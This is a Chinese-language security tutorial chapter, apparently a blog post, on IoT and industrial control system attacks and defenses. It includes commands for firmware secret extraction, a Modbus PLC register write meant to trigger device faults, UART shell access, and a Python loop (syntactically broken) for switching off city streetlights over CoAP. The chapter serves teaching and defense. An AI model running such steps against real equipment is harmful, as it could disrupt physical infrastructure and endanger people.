物联网与工控安全

9.1 物联网(IoT)安全

9.1.1 物联网安全挑战与攻击面

  • 核心问题

  • 默认凭证:设备出厂默认密码(如admin:admin)未修改。

  • 未加密通信:HTTP、MQTT协议明文传输敏感数据。

  • 固件漏洞:未签名固件、硬编码密钥、缓冲区溢出。

  • 典型攻击场景

  • 摄像头劫持:通过Shodan搜索暴露的RTSP服务(端口554),直接访问视频流。

  • 智能家居控制:利用漏洞劫持智能门锁或温控系统。

9.1.2 固件分析与漏洞挖掘

  • 工具链

  • Binwalk:提取固件文件系统。


binwalk -Me firmware.bin 

  • Firmadyne:模拟运行固件,动态分析服务漏洞。

sudo firmadyne/scripts/inferNetwork.sh qemu-arch 1 

  • 实战示例:硬编码密钥提取

# 搜索固件中的敏感字符串

strings firmware.bin | grep -iE "password|key|token"


9.2 工业控制系统(ICS)安全

9.2.1 工控协议与漏洞

  • 常见协议与风险

  • Modbus TCP(端口502):无认证,可远程读写寄存器(如修改PLC控制逻辑)。

  • DNP3(端口20000):缺乏加密,易遭受中间人攻击。

  • OPC UA:相对安全,但配置错误可能导致未授权访问。

  • 攻击工具

  • PLCscan:扫描工控设备并识别协议类型。


python3 plcscan.py -t 192.168.1.1 

  • Modbuspal:模拟Modbus设备,测试恶意指令注入。

9.2.2 工控系统渗透实战

  • 场景:PLC寄存器篡改
  1. 发现设备:Nmap扫描发现开放Modbus端口(nmap -p502 192.168.1.0/24)。

  2. 读取寄存器:使用mbpoll读取PLC数据。


mbpoll -a 1 -t 4 -r 0 -c 10 192.168.1.100 

  1. 写入恶意值:修改寄存器触发设备异常。

mbpoll -a 1 -t 4 -r 0 192.168.1.100 0 1 


9.3 硬件逆向与物理攻击

9.3.1 硬件接口分析

  • 常见接口

  • UART:通过TX/RX引脚获取Shell(波特率通常为115200)。

  • JTAG:调试接口,可提取固件或修改执行流程。

  • 工具与步骤

  1. 识别引脚:使用万用表测量电压,定位GND、TX、RX。

  2. 连接串口:使用USB转TTL模块接入设备。

  3. 获取交互Shell


screen /dev/ttyUSB0 115200 

9.3.2 侧信道攻击

  • 功耗分析:通过监测设备功耗变化推测加密密钥(如AES)。

  • 故障注入

  • 电压毛刺攻击:在特定时钟周期注入电压扰动,跳过安全校验。

  • 激光攻击:精准照射芯片晶体管,改变指令执行逻辑。


9.4 防御与安全加固

9.4.1 物联网设备防护

  • 基础措施

  • 强制修改默认密码:首次启动时要求用户设置复杂密码。

  • 启用TLS加密:MQTT over TLS(端口8883),禁用HTTP。

  • 固件安全

  • 签名验证:启动时校验固件签名,防止未授权更新。

  • 安全启动(Secure Boot):仅允许授权代码在硬件层执行。

9.4.2 工控系统防护

  • 网络隔离

  • 划分OT(操作技术)与IT网络,部署工业防火墙(如Tofino)。

  • 使用单向网关(Data Diode)确保数据单向传输。

  • 协议加固

  • Modbus Secure:为Modbus添加TLS加密与客户端认证。

  • DNP3-SA:启用数字签名与报文完整性校验。

9.4.3 物理安全

  • 硬件防篡改

  • 使用防拆外壳,触发自毁机制(如清除密钥)。

  • 敏感芯片覆盖防护胶(环氧树脂),阻止探针攻击。


9.5 实战案例:智能城市路灯系统攻击

场景:某城市路灯控制系统遭渗透

  1. 漏洞发现
  • Shodan搜索暴露的CoAP协议端口(5683),发现路灯控制终端。
  1. 协议逆向
  • 使用Wireshark捕获控制指令,分析报文结构:

coap://192.168.1.200/light?state=on 

  1. 攻击实施
  • 批量发送关闭指令,导致城市大面积路灯熄灭:

import requests

for ip in路灯IP列表:

requests.get(f"coap://{ip}/light?state=off")

  1. 防御复盘
  • 修复方案:部署CoAP over DTLS加密,限制IP白名单访问。

9.6 未来趋势与挑战
  • 5G与边缘计算:低延迟网络扩大攻击面,需强化边缘节点安全。

  • AI驱动的异常检测:利用机器学习识别工控协议中的异常流量。

  • 法规合规

  • IEC 62443:工控系统安全标准,要求分区域防护与风险评估。

  • GDPR:物联网设备需满足用户隐私数据保护要求。


总结

物联网与工控安全是网络安全的新前线,其特殊性在于融合了数字与物理世界。攻击者可能从一颗摄像头渗透至整个城市网络,或通过篡改PLC引发工业灾难。防御需兼顾协议加密、硬件加固、网络隔离等多层策略,同时紧跟技术演进与合规要求。

你可能感兴趣的:(网络安全,物联网,安全)